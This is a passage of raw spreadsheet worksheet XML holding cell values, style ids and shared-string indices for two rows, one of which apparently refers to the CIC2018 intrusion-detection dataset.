        <v>1</v>
      </c>
      <c r="FC47" s="115" t="s">
        <v>1931</v>
      </c>
      <c r="FD47" s="115">
        <v>1</v>
      </c>
      <c r="FE47" s="116">
        <v>1</v>
      </c>
      <c r="FF47" s="101">
        <v>6</v>
      </c>
      <c r="FG47" s="102" t="s">
        <v>1797</v>
      </c>
      <c r="FH47" s="102">
        <v>1</v>
      </c>
      <c r="FI47" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ47" s="103">
        <v>1</v>
      </c>
      <c r="FK47" s="104">
        <v>1</v>
      </c>
      <c r="FL47" s="105">
        <v>0</v>
      </c>
      <c r="FM47" s="106">
        <v>0</v>
      </c>
      <c r="FN47" s="497">
        <v>0</v>
      </c>
      <c r="FO47" s="107">
        <v>0</v>
      </c>
      <c r="FP47" s="107">
        <v>0</v>
      </c>
      <c r="FQ47" s="108">
        <v>0</v>
      </c>
      <c r="FR47" s="109">
        <v>6</v>
      </c>
      <c r="FS47" s="110" t="s">
        <v>1797</v>
      </c>
      <c r="FT47" s="501">
        <v>1</v>
      </c>
      <c r="FU47" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV47" s="111">
        <v>1</v>
      </c>
      <c r="FW47" s="112">
        <v>1</v>
      </c>
      <c r="FX47" s="113">
        <v>6</v>
      </c>
      <c r="FY47" s="114" t="s">
        <v>1797</v>
      </c>
      <c r="FZ47" s="503">
        <v>1</v>
      </c>
      <c r="GA47" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB47" s="115">
        <v>1</v>
      </c>
      <c r="GC47" s="116">
        <v>1</v>
      </c>
      <c r="GD47" s="250">
        <v>11</v>
      </c>
      <c r="GE47" s="251" t="s">
        <v>3227</v>
      </c>
      <c r="GF47" s="505">
        <v>4</v>
      </c>
      <c r="GG47" s="252" t="s">
        <v>3228</v>
      </c>
      <c r="GH47" s="252">
        <v>4</v>
      </c>
      <c r="GI47" s="253">
        <v>2</v>
      </c>
      <c r="GJ47" s="101">
        <v>17</v>
      </c>
      <c r="GK47" s="102" t="s">
        <v>3231</v>
      </c>
      <c r="GL47" s="102">
        <v>5</v>
      </c>
      <c r="GM47" s="103" t="s">
        <v>3232</v>
      </c>
      <c r="GN47" s="103">
        <v>5</v>
      </c>
      <c r="GO47" s="104">
        <v>2</v>
      </c>
      <c r="GP47" s="105">
        <v>0</v>
      </c>
      <c r="GQ47" s="106">
        <v>0</v>
      </c>
      <c r="GR47" s="497">
        <v>0</v>
      </c>
      <c r="GS47" s="107">
        <v>0</v>
      </c>
      <c r="GT47" s="107">
        <v>0</v>
      </c>
      <c r="GU47" s="108">
        <v>0</v>
      </c>
      <c r="GV47" s="109">
        <v>0</v>
      </c>
      <c r="GW47" s="110">
        <v>0</v>
      </c>
      <c r="GX47" s="501">
        <v>0</v>
      </c>
      <c r="GY47" s="111">
        <v>0</v>
      </c>
      <c r="GZ47" s="111">
        <v>0</v>
      </c>
      <c r="HA47" s="112">
        <v>0</v>
      </c>
      <c r="HB47" s="113">
        <v>6</v>
      </c>
      <c r="HC47" s="114" t="s">
        <v>1797</v>
      </c>
      <c r="HD47" s="503">
        <v>1</v>
      </c>
      <c r="HE47" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF47" s="115">
        <v>1</v>
      </c>
      <c r="HG47" s="116">
        <v>1</v>
      </c>
      <c r="HH47" s="101">
        <v>0</v>
      </c>
      <c r="HI47" s="102">
        <v>0</v>
      </c>
      <c r="HJ47" s="102">
        <v>0</v>
      </c>
      <c r="HK47" s="103">
        <v>0</v>
      </c>
      <c r="HL47" s="103">
        <v>0</v>
      </c>
      <c r="HM47" s="104">
        <v>0</v>
      </c>
      <c r="HN47" s="105">
        <v>0</v>
      </c>
      <c r="HO47" s="106">
        <v>0</v>
      </c>
      <c r="HP47" s="497">
        <v>0</v>
      </c>
      <c r="HQ47" s="107">
        <v>0</v>
      </c>
      <c r="HR47" s="107">
        <v>0</v>
      </c>
      <c r="HS47" s="108">
        <v>0</v>
      </c>
      <c r="HT47" s="109">
        <v>0</v>
      </c>
      <c r="HU47" s="110">
        <v>0</v>
      </c>
      <c r="HV47" s="501">
        <v>0</v>
      </c>
      <c r="HW47" s="111">
        <v>0</v>
      </c>
      <c r="HX47" s="111">
        <v>0</v>
      </c>
      <c r="HY47" s="112">
        <v>0</v>
      </c>
      <c r="HZ47" s="113">
        <v>0</v>
      </c>
      <c r="IA47" s="114">
        <v>0</v>
      </c>
      <c r="IB47" s="503">
        <v>0</v>
      </c>
      <c r="IC47" s="115">
        <v>0</v>
      </c>
      <c r="ID47" s="115">
        <v>0</v>
      </c>
      <c r="IE47" s="116">
        <v>0</v>
      </c>
      <c r="IF47" s="250">
        <v>0</v>
      </c>
      <c r="IG47" s="251">
        <v>0</v>
      </c>
      <c r="IH47" s="505">
        <v>0</v>
      </c>
      <c r="II47" s="252">
        <v>0</v>
      </c>
      <c r="IJ47" s="252">
        <v>0</v>
      </c>
      <c r="IK47" s="253">
        <v>0</v>
      </c>
      <c r="IL47" s="101">
        <v>0</v>
      </c>
      <c r="IM47" s="102">
        <v>0</v>
      </c>
      <c r="IN47" s="102">
        <v>0</v>
      </c>
      <c r="IO47" s="103">
        <v>0</v>
      </c>
      <c r="IP47" s="103">
        <v>0</v>
      </c>
      <c r="IQ47" s="104">
        <v>0</v>
      </c>
      <c r="IR47" s="105">
        <v>0</v>
      </c>
      <c r="IS47" s="106">
        <v>0</v>
      </c>
      <c r="IT47" s="497">
        <v>0</v>
      </c>
      <c r="IU47" s="107">
        <v>0</v>
      </c>
      <c r="IV47" s="107">
        <v>0</v>
      </c>
      <c r="IW47" s="108">
        <v>0</v>
      </c>
      <c r="IX47" s="109">
        <v>0</v>
      </c>
      <c r="IY47" s="110">
        <v>0</v>
      </c>
      <c r="IZ47" s="501">
        <v>0</v>
      </c>
      <c r="JA47" s="111">
        <v>0</v>
      </c>
      <c r="JB47" s="111">
        <v>0</v>
      </c>
      <c r="JC47" s="112">
        <v>0</v>
      </c>
      <c r="JD47" s="113">
        <v>0</v>
      </c>
      <c r="JE47" s="114">
        <v>0</v>
      </c>
      <c r="JF47" s="503">
        <v>0</v>
      </c>
      <c r="JG47" s="115">
        <v>0</v>
      </c>
      <c r="JH47" s="115">
        <v>0</v>
      </c>
      <c r="JI47" s="116">
        <v>0</v>
      </c>
      <c r="JJ47" s="101">
        <v>0</v>
      </c>
      <c r="JK47" s="102">
        <v>0</v>
      </c>
      <c r="JL47" s="102">
        <v>0</v>
      </c>
      <c r="JM47" s="103">
        <v>0</v>
      </c>
      <c r="JN47" s="103">
        <v>0</v>
      </c>
      <c r="JO47" s="104">
        <v>0</v>
      </c>
      <c r="JP47" s="105">
        <v>0</v>
      </c>
      <c r="JQ47" s="106">
        <v>0</v>
      </c>
      <c r="JR47" s="497">
        <v>0</v>
      </c>
      <c r="JS47" s="107">
        <v>0</v>
      </c>
      <c r="JT47" s="107">
        <v>0</v>
      </c>
      <c r="JU47" s="108">
        <v>0</v>
      </c>
      <c r="JV47" s="109">
        <v>0</v>
      </c>
      <c r="JW47" s="110">
        <v>0</v>
      </c>
      <c r="JX47" s="501">
        <v>0</v>
      </c>
      <c r="JY47" s="111">
        <v>0</v>
      </c>
      <c r="JZ47" s="111">
        <v>0</v>
      </c>
      <c r="KA47" s="112">
        <v>0</v>
      </c>
      <c r="KB47" s="113">
        <v>0</v>
      </c>
      <c r="KC47" s="114">
        <v>0</v>
      </c>
      <c r="KD47" s="503">
        <v>0</v>
      </c>
      <c r="KE47" s="115">
        <v>0</v>
      </c>
      <c r="KF47" s="115">
        <v>0</v>
      </c>
      <c r="KG47" s="116">
        <v>0</v>
      </c>
      <c r="KH47" s="250">
        <v>0</v>
      </c>
      <c r="KI47" s="251">
        <v>0</v>
      </c>
      <c r="KJ47" s="505">
        <v>0</v>
      </c>
      <c r="KK47" s="252">
        <v>0</v>
      </c>
      <c r="KL47" s="252">
        <v>0</v>
      </c>
      <c r="KM47" s="253">
        <v>0</v>
      </c>
      <c r="KN47" s="101">
        <v>0</v>
      </c>
      <c r="KO47" s="102">
        <v>0</v>
      </c>
      <c r="KP47" s="102">
        <v>0</v>
      </c>
      <c r="KQ47" s="103">
        <v>0</v>
      </c>
      <c r="KR47" s="103">
        <v>0</v>
      </c>
      <c r="KS47" s="104">
        <v>0</v>
      </c>
      <c r="KT47" s="105">
        <v>0</v>
      </c>
      <c r="KU47" s="106">
        <v>0</v>
      </c>
      <c r="KV47" s="497">
        <v>0</v>
      </c>
      <c r="KW47" s="107">
        <v>0</v>
      </c>
      <c r="KX47" s="107">
        <v>0</v>
      </c>
      <c r="KY47" s="108">
        <v>0</v>
      </c>
      <c r="KZ47" s="109">
        <v>0</v>
      </c>
      <c r="LA47" s="110">
        <v>0</v>
      </c>
      <c r="LB47" s="501">
        <v>0</v>
      </c>
      <c r="LC47" s="111">
        <v>0</v>
      </c>
      <c r="LD47" s="111">
        <v>0</v>
      </c>
      <c r="LE47" s="112">
        <v>0</v>
      </c>
      <c r="LF47" s="113">
        <v>0</v>
      </c>
      <c r="LG47" s="114">
        <v>0</v>
      </c>
      <c r="LH47" s="503">
        <v>0</v>
      </c>
      <c r="LI47" s="115">
        <v>0</v>
      </c>
      <c r="LJ47" s="115">
        <v>0</v>
      </c>
      <c r="LK47" s="116">
        <v>0</v>
      </c>
      <c r="LL47" s="117">
        <v>5</v>
      </c>
      <c r="LM47" s="507">
        <v>5</v>
      </c>
      <c r="LN47" s="119">
        <v>1</v>
      </c>
      <c r="LO47" s="119">
        <v>4</v>
      </c>
      <c r="LP47" s="119">
        <v>4</v>
      </c>
      <c r="LQ47" s="119">
        <v>1</v>
      </c>
      <c r="LR47" s="119">
        <v>3</v>
      </c>
      <c r="LS47" s="119">
        <v>3</v>
      </c>
      <c r="LT47" s="382"/>
      <c r="LU47" s="117">
        <v>1</v>
      </c>
      <c r="LV47" s="118" t="s">
        <v>4219</v>
      </c>
      <c r="LW47" s="507">
        <v>1</v>
      </c>
      <c r="LX47" s="119" t="s">
        <v>3233</v>
      </c>
      <c r="LY47" s="119">
        <v>1</v>
      </c>
      <c r="LZ47" s="119">
        <v>1</v>
      </c>
      <c r="MA47" s="117">
        <v>0</v>
      </c>
      <c r="MB47" s="118">
        <v>0</v>
      </c>
      <c r="MC47" s="507">
        <v>0</v>
      </c>
      <c r="MD47" s="119">
        <v>0</v>
      </c>
      <c r="ME47" s="119">
        <v>0</v>
      </c>
      <c r="MF47" s="119">
        <v>0</v>
      </c>
      <c r="MG47" s="117">
        <v>0</v>
      </c>
      <c r="MH47" s="118">
        <v>0</v>
      </c>
      <c r="MI47" s="507">
        <v>0</v>
      </c>
      <c r="MJ47" s="119">
        <v>0</v>
      </c>
      <c r="MK47" s="119">
        <v>0</v>
      </c>
      <c r="ML47" s="119">
        <v>0</v>
      </c>
      <c r="MM47" s="117">
        <v>0</v>
      </c>
      <c r="MN47" s="118">
        <v>0</v>
      </c>
      <c r="MO47" s="507">
        <v>0</v>
      </c>
      <c r="MP47" s="119">
        <v>0</v>
      </c>
      <c r="MQ47" s="119">
        <v>0</v>
      </c>
      <c r="MR47" s="119">
        <v>0</v>
      </c>
      <c r="MS47" s="117">
        <v>0</v>
      </c>
      <c r="MT47" s="118">
        <v>0</v>
      </c>
      <c r="MU47" s="507">
        <v>0</v>
      </c>
      <c r="MV47" s="119">
        <v>0</v>
      </c>
      <c r="MW47" s="119">
        <v>0</v>
      </c>
      <c r="MX47" s="119">
        <v>0</v>
      </c>
      <c r="MY47" s="117">
        <v>0</v>
      </c>
      <c r="MZ47" s="118">
        <v>0</v>
      </c>
      <c r="NA47" s="507">
        <v>0</v>
      </c>
      <c r="NB47" s="119">
        <v>0</v>
      </c>
      <c r="NC47" s="119">
        <v>0</v>
      </c>
      <c r="ND47" s="119">
        <v>0</v>
      </c>
      <c r="NE47" s="117">
        <v>1</v>
      </c>
      <c r="NF47" s="118" t="s">
        <v>4180</v>
      </c>
      <c r="NG47" s="507">
        <v>1</v>
      </c>
      <c r="NH47" s="119" t="s">
        <v>2754</v>
      </c>
      <c r="NI47" s="119">
        <v>1</v>
      </c>
      <c r="NJ47" s="119">
        <v>1</v>
      </c>
      <c r="NK47" s="117">
        <v>0</v>
      </c>
      <c r="NL47" s="118">
        <v>0</v>
      </c>
      <c r="NM47" s="507">
        <v>0</v>
      </c>
      <c r="NN47" s="119">
        <v>0</v>
      </c>
      <c r="NO47" s="119">
        <v>0</v>
      </c>
      <c r="NP47" s="119">
        <v>0</v>
      </c>
      <c r="NQ47" s="117">
        <v>0</v>
      </c>
      <c r="NR47" s="118">
        <v>0</v>
      </c>
      <c r="NS47" s="507">
        <v>0</v>
      </c>
      <c r="NT47" s="119">
        <v>0</v>
      </c>
      <c r="NU47" s="119">
        <v>0</v>
      </c>
      <c r="NV47" s="119">
        <v>0</v>
      </c>
      <c r="NW47" s="117">
        <v>3</v>
      </c>
      <c r="NX47" s="118" t="s">
        <v>4364</v>
      </c>
      <c r="NY47" s="507">
        <v>3</v>
      </c>
      <c r="NZ47" s="119" t="s">
        <v>4365</v>
      </c>
      <c r="OA47" s="119">
        <v>3</v>
      </c>
      <c r="OB47" s="119">
        <v>3</v>
      </c>
      <c r="OC47" s="120">
        <v>1</v>
      </c>
      <c r="OD47" s="120">
        <v>1</v>
      </c>
      <c r="OE47" s="120">
        <v>1</v>
      </c>
      <c r="OF47" s="121">
        <v>1</v>
      </c>
      <c r="OG47" s="120">
        <v>1</v>
      </c>
      <c r="OH47" s="120">
        <v>1</v>
      </c>
      <c r="OI47" s="120">
        <v>1</v>
      </c>
      <c r="OJ47" s="120">
        <v>1</v>
      </c>
      <c r="OK47" s="383"/>
      <c r="OL47" s="120">
        <v>1</v>
      </c>
      <c r="OM47" s="120">
        <v>1</v>
      </c>
      <c r="ON47" s="120">
        <v>1</v>
      </c>
      <c r="OO47" s="120" t="s">
        <v>2503</v>
      </c>
      <c r="OP47" s="120">
        <v>1</v>
      </c>
      <c r="OQ47" s="464">
        <v>1</v>
      </c>
      <c r="OR47" s="120">
        <v>0</v>
      </c>
      <c r="OS47" s="120">
        <v>0</v>
      </c>
      <c r="OT47" s="120">
        <v>0</v>
      </c>
      <c r="OU47" s="120"/>
      <c r="OV47" s="120">
        <v>0</v>
      </c>
      <c r="OW47" s="464">
        <v>0</v>
      </c>
      <c r="OX47" s="120">
        <v>0</v>
      </c>
      <c r="OY47" s="120">
        <v>0</v>
      </c>
      <c r="OZ47" s="120">
        <v>0</v>
      </c>
      <c r="PA47" s="120"/>
      <c r="PB47" s="120">
        <v>0</v>
      </c>
      <c r="PC47" s="464">
        <v>0</v>
      </c>
      <c r="PD47" s="120">
        <v>0</v>
      </c>
      <c r="PE47" s="120">
        <v>0</v>
      </c>
      <c r="PF47" s="120">
        <v>0</v>
      </c>
      <c r="PG47" s="120"/>
      <c r="PH47" s="120">
        <v>0</v>
      </c>
      <c r="PI47" s="464">
        <v>0</v>
      </c>
      <c r="PJ47" s="120">
        <v>0</v>
      </c>
      <c r="PK47" s="120">
        <v>0</v>
      </c>
      <c r="PL47" s="120">
        <v>0</v>
      </c>
      <c r="PM47" s="120"/>
      <c r="PN47" s="120">
        <v>0</v>
      </c>
      <c r="PO47" s="464">
        <v>0</v>
      </c>
      <c r="PP47" s="120">
        <v>0</v>
      </c>
      <c r="PQ47" s="120">
        <v>0</v>
      </c>
      <c r="PR47" s="120">
        <v>0</v>
      </c>
      <c r="PS47" s="120"/>
      <c r="PT47" s="120">
        <v>0</v>
      </c>
      <c r="PU47" s="464">
        <v>0</v>
      </c>
      <c r="PV47" s="120">
        <v>0</v>
      </c>
      <c r="PW47" s="120">
        <v>0</v>
      </c>
      <c r="PX47" s="120">
        <v>0</v>
      </c>
      <c r="PY47" s="120"/>
      <c r="PZ47" s="120">
        <v>0</v>
      </c>
      <c r="QA47" s="464">
        <v>0</v>
      </c>
      <c r="QB47" s="120">
        <v>0</v>
      </c>
      <c r="QC47" s="120">
        <v>0</v>
      </c>
      <c r="QD47" s="120">
        <v>0</v>
      </c>
      <c r="QE47" s="120"/>
      <c r="QF47" s="120">
        <v>0</v>
      </c>
      <c r="QG47" s="464">
        <v>0</v>
      </c>
      <c r="QH47" s="120">
        <v>1</v>
      </c>
      <c r="QI47" s="120">
        <v>1</v>
      </c>
      <c r="QJ47" s="120">
        <v>1</v>
      </c>
      <c r="QK47" s="120" t="s">
        <v>1561</v>
      </c>
      <c r="QL47" s="120">
        <v>1</v>
      </c>
      <c r="QM47" s="464">
        <v>1</v>
      </c>
      <c r="QN47" s="120">
        <v>0</v>
      </c>
      <c r="QO47" s="120">
        <v>0</v>
      </c>
      <c r="QP47" s="120">
        <v>0</v>
      </c>
      <c r="QQ47" s="120"/>
      <c r="QR47" s="120">
        <v>0</v>
      </c>
      <c r="QS47" s="464">
        <v>0</v>
      </c>
      <c r="QT47" s="184"/>
      <c r="QU47" s="184"/>
      <c r="QV47" s="184"/>
      <c r="QW47" s="184"/>
      <c r="QX47" s="184"/>
      <c r="QY47" s="184"/>
      <c r="QZ47" s="184"/>
      <c r="RA47" s="184"/>
      <c r="RB47" s="184"/>
      <c r="RC47" s="184"/>
      <c r="RD47" s="184"/>
      <c r="RE47" s="184"/>
      <c r="RF47" s="184"/>
      <c r="RG47" s="184"/>
      <c r="RH47" s="184"/>
      <c r="RI47" s="184"/>
      <c r="RJ47" s="184"/>
      <c r="RK47" s="184"/>
      <c r="RL47" s="184"/>
      <c r="RM47" s="184"/>
      <c r="RN47" s="184"/>
      <c r="RO47" s="184"/>
      <c r="RP47" s="184"/>
      <c r="RQ47" s="184"/>
      <c r="RR47" s="184"/>
      <c r="RS47" s="184"/>
      <c r="RT47" s="184"/>
      <c r="RU47" s="184"/>
      <c r="RV47" s="184"/>
      <c r="RW47" s="184"/>
      <c r="RX47" s="184"/>
      <c r="RY47" s="184"/>
      <c r="RZ47" s="184"/>
      <c r="SA47" s="184"/>
      <c r="SB47" s="184"/>
      <c r="SC47" s="184"/>
      <c r="SD47" s="184"/>
      <c r="SE47" s="184"/>
      <c r="SF47" s="184"/>
      <c r="SG47" s="184"/>
      <c r="SH47" s="184"/>
      <c r="SI47" s="184"/>
      <c r="SJ47" s="184"/>
      <c r="SK47" s="184"/>
      <c r="SL47" s="184"/>
      <c r="SM47" s="184"/>
      <c r="SN47" s="184"/>
      <c r="SO47" s="184"/>
      <c r="SP47" s="184"/>
      <c r="SQ47" s="184"/>
      <c r="SR47" s="184"/>
      <c r="SS47" s="184"/>
      <c r="ST47" s="184"/>
      <c r="SU47" s="184"/>
      <c r="SV47" s="184"/>
      <c r="SW47" s="184"/>
      <c r="SX47" s="184"/>
      <c r="SY47" s="184"/>
      <c r="SZ47" s="184"/>
      <c r="TA47" s="184"/>
      <c r="TB47" s="184"/>
      <c r="TC47" s="184"/>
      <c r="TD47" s="184"/>
      <c r="TE47" s="184"/>
      <c r="TF47" s="184"/>
      <c r="TG47" s="184"/>
      <c r="TH47" s="184"/>
      <c r="TI47" s="184"/>
      <c r="TJ47" s="184"/>
      <c r="TK47" s="184"/>
      <c r="TL47" s="184"/>
      <c r="TM47" s="184"/>
      <c r="TN47" s="184"/>
      <c r="TO47" s="184"/>
      <c r="TP47" s="184"/>
      <c r="TQ47" s="184"/>
      <c r="TR47" s="184"/>
      <c r="TS47" s="184"/>
      <c r="TT47" s="184"/>
      <c r="TU47" s="184"/>
      <c r="TV47" s="184"/>
      <c r="TW47" s="184"/>
      <c r="TX47" s="184"/>
      <c r="TY47" s="184"/>
      <c r="TZ47" s="184"/>
      <c r="UA47" s="184"/>
      <c r="UB47" s="184"/>
      <c r="UC47" s="184"/>
      <c r="UD47" s="184"/>
      <c r="UE47" s="184"/>
      <c r="UF47" s="184"/>
      <c r="UG47" s="184"/>
      <c r="UH47" s="184"/>
      <c r="UI47" s="184"/>
      <c r="UJ47" s="184"/>
      <c r="UK47" s="184"/>
      <c r="UL47" s="184"/>
      <c r="UM47" s="184"/>
      <c r="UN47" s="184"/>
      <c r="UO47" s="184"/>
      <c r="UP47" s="184"/>
      <c r="UQ47" s="184"/>
      <c r="UR47" s="184"/>
      <c r="US47" s="184"/>
      <c r="UT47" s="184"/>
      <c r="UU47" s="184"/>
      <c r="UV47" s="184"/>
      <c r="UW47" s="184"/>
      <c r="UX47" s="184"/>
      <c r="UY47" s="184"/>
      <c r="UZ47" s="184"/>
      <c r="VA47" s="184"/>
      <c r="VB47" s="184"/>
      <c r="VC47" s="184"/>
      <c r="VD47" s="184"/>
      <c r="VE47" s="184"/>
      <c r="VF47" s="184"/>
      <c r="VG47" s="184"/>
      <c r="VH47" s="184"/>
      <c r="VI47" s="184"/>
      <c r="VJ47" s="184"/>
      <c r="VK47" s="184"/>
      <c r="VL47" s="184"/>
      <c r="VM47" s="184"/>
      <c r="VN47" s="184"/>
      <c r="VO47" s="184"/>
      <c r="VP47" s="184"/>
      <c r="VQ47" s="184"/>
      <c r="VR47" s="184"/>
      <c r="VS47" s="184"/>
      <c r="VT47" s="184"/>
      <c r="VU47" s="184"/>
      <c r="VV47" s="184"/>
      <c r="VW47" s="184"/>
      <c r="VX47" s="184"/>
      <c r="VY47" s="184"/>
    </row>
    <row r="48" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A48" s="82" t="s">
        <v>39</v>
      </c>
      <c r="B48" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C48" s="83" t="s">
        <v>344</v>
      </c>
      <c r="D48" s="83" t="s">
        <v>88</v>
      </c>
      <c r="E48" s="83">
        <f t="shared" si="2"/>
        <v>36</v>
      </c>
      <c r="F48" s="83" t="s">
        <v>89</v>
      </c>
      <c r="G48" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H48" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I48" s="81" t="s">
        <v>1174</v>
      </c>
      <c r="J48" s="85" t="s">
        <v>4</v>
      </c>
      <c r="K48" s="81" t="s">
        <v>1175</v>
      </c>
      <c r="L48" s="81" t="s">
        <v>1176</v>
      </c>
      <c r="M48" s="378" t="s">
        <v>636</v>
      </c>
      <c r="N48" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O48" s="485" t="str">
        <f t="shared" si="1"/>
        <v>CIC2018</v>
      </c>
      <c r="P48" s="91"/>
      <c r="Q48" s="379" t="s">
        <v>1008</v>
      </c>
      <c r="R48" s="92" t="s">
        <v>1177</v>
      </c>
      <c r="S48" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T48" s="92" t="s">
        <v>1178</v>
      </c>
      <c r="U48" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V48" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W48" s="96" t="s">
        <v>1179</v>
      </c>
      <c r="X48" s="97" t="s">
        <v>886</v>
      </c>
      <c r="Y48" s="83" t="s">
        <v>886</v>
      </c>
      <c r="Z48" s="98" t="s">
        <v>1180</v>
      </c>
      <c r="AA48" s="86" t="s">
        <v>8</v>
      </c>
      <c r="AB48" s="87" t="s">
        <v>745</v>
      </c>
      <c r="AC48" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD48" s="84"/>
      <c r="AE48" s="84"/>
      <c r="AF48" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG48" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH48" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI48" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ48" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK48" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL48" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM48" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN48" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO48" s="356" t="s">
        <v>747</v>
      </c>
      <c r="AP48" s="357" t="s">
        <v>745</v>
      </c>
      <c r="AQ48" s="358">
        <v>116</v>
      </c>
      <c r="AR48" s="100"/>
      <c r="AS48" s="100">
        <v>112</v>
      </c>
      <c r="AT48" s="100">
        <v>0</v>
      </c>
      <c r="AU48" s="100">
        <v>112</v>
      </c>
      <c r="AV48" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW48" s="100">
        <v>11053</v>
      </c>
      <c r="AX48" s="100">
        <v>11053</v>
      </c>
      <c r="AY48" s="100">
        <v>0</v>
      </c>
      <c r="AZ48" s="100">
        <v>11053</v>
      </c>
      <c r="BA48" s="381"/>
      <c r="BB48" s="101">
        <v>1</v>
      </c>
      <c r="BC48" s="102" t="s">
        <v>1812</v>
      </c>
      <c r="BD48" s="102">
        <v>1</v>
      </c>
      <c r="BE48" s="103" t="s">
        <v>341</v>
      </c>
      <c r="BF48" s="103">
        <v>1</v>
      </c>
      <c r="BG48" s="104">
        <v>1</v>
      </c>
      <c r="BH48" s="190">
        <v>5505</v>
      </c>
      <c r="BI48" s="191" t="s">
        <v>1859</v>
      </c>
      <c r="BJ48" s="498">
        <v>112</v>
      </c>
      <c r="BK48" s="192" t="s">
        <v>1860</v>
      </c>
      <c r="BL48" s="192">
        <v>1</v>
      </c>
      <c r="BM48" s="108">
        <v>112</v>
      </c>
      <c r="BN48" s="109">
        <v>5506</v>
      </c>
      <c r="BO48" s="110" t="s">
        <v>2016</v>
      </c>
      <c r="BP48" s="501">
        <v>113</v>
      </c>
      <c r="BQ48" s="111" t="s">
        <v>2017</v>
      </c>
      <c r="BR48" s="111">
        <v>2</v>
      </c>
      <c r="BS48" s="112">
        <v>112</v>
      </c>
      <c r="BT48" s="113">
        <v>16570</v>
      </c>
      <c r="BU48" s="114" t="s">
        <v>3234</v>
      </c>
      <c r="BV48" s="503">
        <v>233</v>
      </c>
      <c r="BW48" s="115" t="s">
        <v>3235</v>
      </c>
      <c r="BX48" s="115">
        <v>5</v>
      </c>
      <c r="BY48" s="116">
        <v>116</v>
      </c>
      <c r="BZ48" s="250">
        <v>5528</v>
      </c>
      <c r="CA48" s="251" t="s">
        <v>3236</v>
      </c>
      <c r="CB48" s="505">
        <v>135</v>
      </c>
      <c r="CC48" s="252" t="s">
        <v>3237</v>
      </c>
      <c r="CD48" s="252">
        <v>3</v>
      </c>
      <c r="CE48" s="253">
        <v>112</v>
      </c>
      <c r="CF48" s="101">
        <v>22098</v>
      </c>
      <c r="CG48" s="102" t="s">
        <v>3238</v>
      </c>
      <c r="CH48" s="102">
        <v>368</v>
      </c>
      <c r="CI48" s="103" t="s">
        <v>3239</v>
      </c>
      <c r="CJ48" s="103">
        <v>8</v>
      </c>
      <c r="CK48" s="104">
        <v>116</v>
      </c>
      <c r="CL48" s="190">
        <v>0</v>
      </c>
      <c r="CM48" s="191">
        <v>0</v>
      </c>
      <c r="CN48" s="498">
        <v>0</v>
      </c>
      <c r="CO48" s="192">
        <v>0</v>
      </c>
      <c r="CP48" s="192">
        <v>0</v>
      </c>
      <c r="CQ48" s="108">
        <v>0</v>
      </c>
      <c r="CR48" s="109">
        <v>0</v>
      </c>
      <c r="CS48" s="110">
        <v>0</v>
      </c>
      <c r="CT48" s="501">
        <v>0</v>
      </c>
      <c r="CU48" s="111">
        <v>0</v>
      </c>
      <c r="CV48" s="111">
        <v>0</v>
      </c>
      <c r="CW48" s="112">
        <v>0</v>
      </c>
      <c r="CX48" s="113">
        <v>5506</v>
      </c>
      <c r="CY48" s="114" t="s">
        <v>2016</v>
      </c>
      <c r="CZ48" s="503">
        <v>113</v>
      </c>
      <c r="DA48" s="115" t="s">
        <v>2017</v>
      </c>
      <c r="DB48" s="115">
        <v>2</v>
      </c>
      <c r="DC48" s="116">
        <v>112</v>
      </c>
      <c r="DD48" s="101">
        <v>0</v>
      </c>
      <c r="DE48" s="102">
        <v>0</v>
      </c>
      <c r="DF48" s="102">
        <v>0</v>
      </c>
      <c r="DG48" s="103">
        <v>0</v>
      </c>
      <c r="DH48" s="103">
        <v>0</v>
      </c>
      <c r="DI48" s="104">
        <v>0</v>
      </c>
      <c r="DJ48" s="190">
        <v>5505</v>
      </c>
      <c r="DK48" s="191" t="s">
        <v>1859</v>
      </c>
      <c r="DL48" s="498">
        <v>112</v>
      </c>
      <c r="DM48" s="192" t="s">
        <v>1860</v>
      </c>
      <c r="DN48" s="192">
        <v>1</v>
      </c>
      <c r="DO48" s="108">
        <v>112</v>
      </c>
      <c r="DP48" s="109">
        <v>5505</v>
      </c>
      <c r="DQ48" s="110" t="s">
        <v>1859</v>
      </c>
      <c r="DR48" s="501">
        <v>112</v>
      </c>
      <c r="DS48" s="111" t="s">
        <v>1860</v>
      </c>
      <c r="DT48" s="111">
        <v>1</v>
      </c>
      <c r="DU48" s="112">
        <v>112</v>
      </c>
      <c r="DV48" s="113">
        <v>16567</v>
      </c>
      <c r="DW48" s="114" t="s">
        <v>3240</v>
      </c>
      <c r="DX48" s="503">
        <v>231</v>
      </c>
      <c r="DY48" s="115" t="s">
        <v>3241</v>
      </c>
      <c r="DZ48" s="115">
        <v>3</v>
      </c>
      <c r="EA48" s="116">
        <v>115</v>
      </c>
      <c r="EB48" s="250">
        <v>5509</v>
      </c>
      <c r="EC48" s="251" t="s">
        <v>3242</v>
      </c>
      <c r="ED48" s="505">
        <v>116</v>
      </c>
      <c r="EE48" s="252" t="s">
        <v>3243</v>
      </c>
      <c r="EF48" s="252">
        <v>2</v>
      </c>
      <c r="EG48" s="253">
        <v>112</v>
      </c>
      <c r="EH48" s="101">
        <v>22076</v>
      </c>
      <c r="EI48" s="102" t="s">
        <v>3244</v>
      </c>
      <c r="EJ48" s="102">
        <v>347</v>
      </c>
      <c r="EK48" s="103" t="s">
        <v>3245</v>
      </c>
      <c r="EL48" s="103">
        <v>5</v>
      </c>
